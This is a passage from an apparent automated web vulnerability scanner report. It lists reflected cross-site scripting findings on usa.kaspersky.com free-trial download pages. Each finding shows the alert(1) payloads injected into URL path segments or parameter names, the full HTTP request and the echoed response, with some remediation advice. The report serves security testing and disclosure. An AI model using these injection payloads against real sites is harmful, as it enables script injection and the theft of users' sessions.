Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686346"
Content-Type: text/html; charset=utf-8
Content-Length: 30300
Date: Sat, 18 Dec 2010 15:32:30 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads7655f"><script>alert(1)</script>a64818b075b/free-trials/free-business-trials" />
...[SNIP]...

1.63. http://usa.kaspersky.com/downloads/free-trials/free-business-trials [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-business-trials

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40cc5"-alert(1)-"d6c9876ca56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads40cc5"-alert(1)-"d6c9876ca56/free-trials/free-business-trials HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:32:46 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686366"
Content-Type: text/html; charset=utf-8
Content-Length: 38257
Date: Sat, 18 Dec 2010 15:32:56 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads40cc5"-alert(1)-"d6c9876ca56/free-trials/free-business-trials";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.64. http://usa.kaspersky.com/downloads/free-trials/free-business-trials [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-business-trials

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acc8b"-alert(1)-"dc50efbe00c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/free-trialsacc8b"-alert(1)-"dc50efbe00c/free-business-trials HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:34:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686495"
Content-Type: text/html; charset=utf-8
Content-Length: 38641
Date: Sat, 18 Dec 2010 15:35:03 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
= " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/free-trialsacc8b"-alert(1)-"dc50efbe00c/free-business-trials";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.65. http://usa.kaspersky.com/downloads/free-trials/free-business-trials [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-business-trials

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d155"><script>alert(1)</script>c794bcdbe43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-trials3d155"><script>alert(1)</script>c794bcdbe43/free-business-trials HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:34:35 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686475"
Content-Type: text/html; charset=utf-8
Content-Length: 30427
Date: Sat, 18 Dec 2010 15:34:41 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-trials3d155"><script>alert(1)</script>c794bcdbe43/free-business-trials" />
...[SNIP]...

1.66. http://usa.kaspersky.com/downloads/free-trials/free-business-trials [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-business-trials

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3978"-alert(1)-"4061739823c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/free-trials/free-business-trialsb3978"-alert(1)-"4061739823c HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:37:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686643"
Content-Type: text/html; charset=utf-8
Content-Length: 38641
Date: Sat, 18 Dec 2010 15:37:31 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/free-trials/free-business-trialsb3978"-alert(1)-"4061739823c";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.67. http://usa.kaspersky.com/downloads/free-trials/free-business-trials [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-business-trials

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f514"><script>alert(1)</script>935154ea73b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-trials/free-business-trials3f514"><script>alert(1)</script>935154ea73b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:36:59 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686619"
Content-Type: text/html; charset=utf-8
Content-Length: 30427
Date: Sat, 18 Dec 2010 15:37:06 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-trials/free-business-trials3f514"><script>alert(1)</script>935154ea73b" />
...[SNIP]...

1.68. http://usa.kaspersky.com/downloads/free-trials/free-business-trials [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-business-trials

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17cc5"><script>alert(1)</script>b90875227a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-trials/free-business-trials?17cc5"><script>alert(1)</script>b90875227a4=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:29:47 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686187"
Content-Type: text/html; charset=utf-8
Content-Length: 38670
Date: Sat, 18 Dec 2010 15:29:55 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-trials/free-business-trials?17cc5"><script>alert(1)</script>b90875227a4=1" />
...[SNIP]...

1.69. http://usa.kaspersky.com/downloads/free-trials/free-home-trials [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-home-trials

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f0e7"><script>alert(1)</script>58d900b7ba3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads8f0e7"><script>alert(1)</script>58d900b7ba3/free-trials/free-home-trials HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:33:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686398"
Content-Type: text/html; charset=utf-8
Content-Length: 30277
Date: Sat, 18 Dec 2010 15:33:25 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads8f0e7"><script>alert(1)</script>58d900b7ba3/free-trials/free-home-trials" />
...[SNIP]...

1.70. http://usa.kaspersky.com/downloads/free-trials/free-home-trials [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-home-trials

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 920da"-alert(1)-"fecf52ce450 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads920da"-alert(1)-"fecf52ce450/free-trials/free-home-trials HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:33:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686420"
Content-Type: text/html; charset=utf-8
Content-Length: 34248
Date: Sat, 18 Dec 2010 15:33:50 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
') { s.prop4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads920da"-alert(1)-"fecf52ce450/free-trials/free-home-trials";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.71. http://usa.kaspersky.com/downloads/free-trials/free-home-trials [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-home-trials

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bed78"-alert(1)-"7c8359aee8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/free-trialsbed78"-alert(1)-"7c8359aee8b/free-home-trials HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:35:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686554"
Content-Type: text/html; charset=utf-8
Content-Length: 34439
Date: Sat, 18 Dec 2010 15:36:05 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
= " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/free-trialsbed78"-alert(1)-"7c8359aee8b/free-home-trials";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.72. http://usa.kaspersky.com/downloads/free-trials/free-home-trials [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-home-trials

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad3ee"><script>alert(1)</script>33fcf630d58 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-trialsad3ee"><script>alert(1)</script>33fcf630d58/free-home-trials HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:35:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686531"
Content-Type: text/html; charset=utf-8
Content-Length: 30403
Date: Sat, 18 Dec 2010 15:35:38 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-trialsad3ee"><script>alert(1)</script>33fcf630d58/free-home-trials" />
...[SNIP]...

1.73. http://usa.kaspersky.com/downloads/free-trials/free-home-trials [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-home-trials

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1464c"><script>alert(1)</script>889fc9b3239 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-trials/free-home-trials1464c"><script>alert(1)</script>889fc9b3239 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:37:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686674"
Content-Type: text/html; charset=utf-8
Content-Length: 30403
Date: Sat, 18 Dec 2010 15:37:59 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/downloads/free-trials/free-home-trials1464c"><script>alert(1)</script>889fc9b3239" />
...[SNIP]...

1.74. http://usa.kaspersky.com/downloads/free-trials/free-home-trials [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-home-trials

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0b7c"-alert(1)-"9a485c6656b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /downloads/free-trials/free-home-trialsf0b7c"-alert(1)-"9a485c6656b HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:38:14 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686694"
Content-Type: text/html; charset=utf-8
Content-Length: 34439
Date: Sat, 18 Dec 2010 15:38:22 GMT
Connection: close
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
}
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/downloads/free-trials/free-home-trialsf0b7c"-alert(1)-"9a485c6656b";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.75. http://usa.kaspersky.com/downloads/free-trials/free-home-trials [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /downloads/free-trials/free-home-trials

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68cd1"><script>alert(1)</script>48d4db416d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/free-trials/free-home-trials?68cd1"><script>alert(1)</script>48d4db416d5=1 HTTP/1.1
Host: usa.kaspersky.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=205612169.1292640884.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_vi=[CS]v1|2686113C85079B6B-40000102E0040F2E[CE]; s_sq=kaspersky-usa%3D%2526pid%253DDownloads%2526pidt%253D1%2526oid%253DDownload%2526oidt%253D3%2526ot%253DSUBMIT; s_nr=1292684799744-Repeat; __utma=205612169.1516648321.1292640884.1292640884.1292684729.2; __utmc=205612169; __utmb=205612169.7.9.1292684745062; gpv_pageName=Downloads;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=21600
Last-Modified: Sat, 18 Dec 2010 15:30:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1292686218"
Content-Type: text/html; charset=utf-8
Content-Length: 42926
Date: Sat, 18 Dec 2010 15:30:30 GMT
Connection: close
X-VC: MISS

